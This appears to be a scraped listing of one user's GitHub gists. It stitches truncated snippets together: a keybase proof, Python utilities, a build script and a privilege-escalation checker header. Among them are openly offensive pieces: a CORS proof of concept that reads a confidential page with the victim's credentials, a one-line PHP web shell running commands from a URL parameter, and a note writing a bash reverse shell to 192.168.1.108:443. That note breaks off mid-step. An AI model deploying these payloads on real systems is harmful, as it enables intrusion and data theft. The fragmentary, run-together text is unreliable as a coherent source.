I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object:
<html> | |
<body> | |
<iframe src='data:text/html,<script> | |
var xhr = new XMLHttpRequest(); | |
xhr.open("GET", "https://vuln-app.com/confidential", true); | |
xhr.withCredentials = true; | |
xhr.onload = function () { | |
if (xhr.readyState === xhr.DONE) { | |
console.log(xhr.response); | |
} |
I hereby claim:
To claim this, I am signing this object:
# Store this file in ~/.pystartup, | |
# set "export PYTHONSTARTUP=/home/user/.pystartup" | |
# | |
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the | |
# full path to your home directory. | |
import atexit | |
import os | |
import readline | |
import rlcompleter |
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) != 2: | |
print "usage: %s names.txt" % (sys.argv[0]) | |
sys.exit(0) | |
for line in open(sys.argv[1]): | |
name = ''.join([c for c in line if c == " " or c.isalpha()]) |
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz | |
tar xzvf Python-2.7.11.tgz | |
cd Python-2.7.11 | |
./configure --prefix=/usr/local --enable-shared | |
make | |
make install |
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |
<?php | |
system($_GET['cmd']); | |
?> |
I'd faced issue while executing any command using .run
command as it doesn't supporting white spaces and raising exception(for example ls index.html
).
I figured up it by creating a .sh file with limited privledge session(www-data) in /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in hexchat exexcute: